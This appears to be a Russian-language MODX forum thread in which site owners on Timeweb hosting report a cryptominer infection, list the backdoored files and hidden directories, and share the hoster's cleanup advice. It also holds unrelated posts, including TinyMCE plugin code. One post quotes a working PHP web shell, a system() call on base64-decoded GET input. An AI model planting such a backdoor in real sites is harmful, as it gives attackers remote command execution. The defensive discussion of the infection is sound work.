Заметил данный пост, и не я один такой)) Сайт отрубали, пришлось скачивать его на локалку, прогонять через утилиту — ai-bolit.
Сайт был версии 2.7.2
Зараженные директории:

1. assets/components/formit/js/mgr/widgets/migrate.panel.php
2. assets/components/migx/js/mgr/widgets/grids/migxgallery.grid.php
3. assets/components/pdotools/js/pdopage.min.php

Сам код во всех файлах одинаковый

<?php system(base64_decode($_GET['t']))

Ну и да как уже выше писали на уровень выше корня сайта были созданы директории:
.local, .config — в которых и была пакасть.
Компоненты обновил, систему обновил, дрянь удалил.
3й День пока все ок

А вы какой планировщик имеете ввиду? (Scheduler — modstore.pro/packages/utilities/scheduler) он?
Но там ведь нет возможности указать периодичность запусков заданий. Только можно указать точное время запуска.
При такой структуре Scheduler'а, для достижения периодичности выполнения нужно будет реализовать логику самоперепланирования внутри скриптов, а первый запуск придется сделать вручную. Это как-то не очень удобно не находите? и не очень надежно. Если вы знаете в каком компоненте есть реализация нормальной работы с этим планировщиком напишите. я гляну, вдруг что-то не так понимаю.

Здравствуйте. А с т-банк этот компонент пойдет?

Жаль, что редко стал заходить на форум и не успел поставить лайк и поблагодарить. Отличные уроки!

У Office есть приятная фича- возможность залогиниться в любого пользователя. Такого функционала у Cabinet не планируется?

Пару дней назад тоже самое у одного клиента. Найти закономерностей или каких-то уязвимых пакетов не получилось.
А вот хостинг как раз Timeweb — и очень похоже, что именно у них где-то дырка. Что характерно — заблокировали молча, без всяких предупреждений о нагрузке — потом изучая график нагрузки стало понятно, что уже больше месяца этот майнер работал.
Так же рекомендую произвести поиск каким-нибудь антивирусам по популярным функциям типа base64_decode или развернуть старый бэкап — так как было найдено 3 бэкдора в разных папках сайта + админер в одной из папок, которых ранее точно не было.

Привет, может я и припозднился с ответом, но столкнулся с такой же проблемой спустя 3 года) Помогло такое решение:

&where=`{"properties:LIKE": "%\"rate\":\"5\"%"}`

Круто! Считай готовый «антивирус». Конечно голосуем за пакет! (и поддержку sсheduler для периодического запуска :))

Хорошее решения для того что бы не отслеживать сайт самому, да ещё и уведомляет в телеграм, интересно на сколько сильно загружает во время обработки, а так супер, если будет приложение, я думаю будет пользоваться спросом

Добрый день! Тоже была эта проблема.
Сейчас нашел по адресу /public_html/assets/components/tinymce/action.php
Аккаунт cg69669

cc55225

Я связывался с персональным менеджером timeweb, она попросила, чтобы вы все написали названия аккаунтов, она создаст массовую заявку на рассмотрение проблемы.

У меня tinymcerte
Для него делал следующим образом:

1) В системных настройках (tinymcerte.plugins) в список плагинов редактора добавил свой myButtons

2) создал папку myButtons и файл внутри

assets/components/tinymcerte/js/vendor/tinymce/plugins/myButtons/plugin.min.js

В самом файле следующий код.
Оставил добавление двух видов, кнопку и ссылку

tinymce.PluginManager.add('myButtons', function (editor, url) {

    // Add a button that opens a window
    editor.addButton('myButtonLink', {
        text: 'Кнопка ссылка',
        icon: false,
        onclick: function () {
            // Open window
            editor.windowManager.open({
                title: 'Параметры кнопки',
                minWidth: 500,
                body: [
                    {
                        type: 'textbox',
                        name: 'btnlink',
                        label: 'Ссылка',
                        tooltip: 'Если это ресурс на сайте, то указывать так: [[~33]] : где 33 - id ресурса/товара',
                    },
                    {
                        type: 'textbox',
                        name: 'btntext',
                        label: 'Текст на кнопке',
                        tooltip: '',
                    },
                    {
                        type: 'listbox',  
                        name: 'btnclass',  
                        label: 'Вид кнопки', 
                        values: [
                            { text: 'Зеленая', value: 'btn-green' },
                            { text: 'Синяя', value: 'btn-blue' }
                        ]
                    }
                ],
                onsubmit: function (e) { 
                    if (!e.data.btnlink) {  
                        alert('Укажите ссылку для кнопки!');
                        return false;
                    }    
                    editor.insertContent('<a href="'+e.data.btnlink+'" class="btn btn-middle '+e.data.btnclass+'">'+e.data.btntext+'</a>');
                }
            });
        }
    });


    // Написать нам
    editor.addButton('myButtonScribeUs', {
        text: 'Написать нам',
        icon: false,
        onclick: function () { 
            editor.insertContent('<button type="button" class="btn btn-dark btn-middle" data-toggle="modal" data-target="#write-us" data-tab="0">Написать нам</button>'); 
        }
    });

});

Как это выглядит по итогу

У меня именно и только такое ощущение, что проблема в хостинге. Ни на каких других данная проблема не проявилась.
У timeweb появилась функция изоляции сайта, не знаю как давно, обнаружил ее недавно. по умолчанию она выключена, может включенная она поможет, если заражение пришло от соседских аккаунтов.

Ни у кого не возникло ощущение, что проблема в самом timeweb?
Читаю комменты выше и вижу что все хостятся на таймвебе. У нас тоже около 30 сайтов на таймвебе, около 30 у других хостеров. Проболемы возникают пока только на тех, кто на таймвебе.
Есть среди пострадавших те, у кого иной хостинг?
Кто то уже проводил анализ своего сайта на предмет, как именно сайт становится источником заражения? (потому что я пока тупо не успеваю, очень долго в переписке прощу, чтобы хостинг вернул доступ к директории нашего пользователя, они пишут что вернули, я вхожу по ssh но через считанные секунды мне хостинг снова меняет права на мою директорию и я снова не могу даже скачать якобы зараженные файлы сайта. И так по кругу).

Это даст кратковременный результат, от пары минут, до пары недель.

Сайт написан на WP. Отношение к MODX не имеет. Пользователь просто аккуратно расставляет ссылки для SEO.

Такая же проблема. Таймвеб заблокировал сайты по превышению нагрузки на процессор.
В качестве рекомендаций получены следующие инструкции.
Может кому-то пригодятся, сам пока не вникал

В первую очередь рекомендуем проверить следующие директории, так как очень часто подозрительные процессы запускаются именно из них:
~/.config/session/config/logs/php-fpm/model/observer/
~/.local/session/config/logs/php-fpm/model/observer/
~/.gnupg/session/config/logs/php-fpm/model/observer/
~/.gnupg/php-fpm/session/mods/logs/config/observer/
~/.gnupg/config/mods/logs/session/php-fpm/observer/
~/.config/htop/defunct.dat
~/.config/htop/defunct
Если директории из списка выше существуют, рекомендую по возможности их удалить.
Дополнительно прошу удалить файл ~/.profile

Также вижу, после разблокировки на аккаунте запустились следующие подозрительные процессы:

[slub_flushwq] 

Поэтому рекомендую подключиться к консоли аккаунта и выполнить команду:
killall -9 -u $(whoami)
Которая завершит все пользовательские процессы, включая вредоносные.

Ответ ТП:
Наши инженеры уже в курсе проблемы и собрали достаточно информации по майнеру. Паттерны выявили и сейчас ищем оптимальное решение.

А да, похожие файлы встречался у меня и в pdotools и в других модулях (У меня задено много сайтов на разных аккаунтах, поэтому могу сравнить)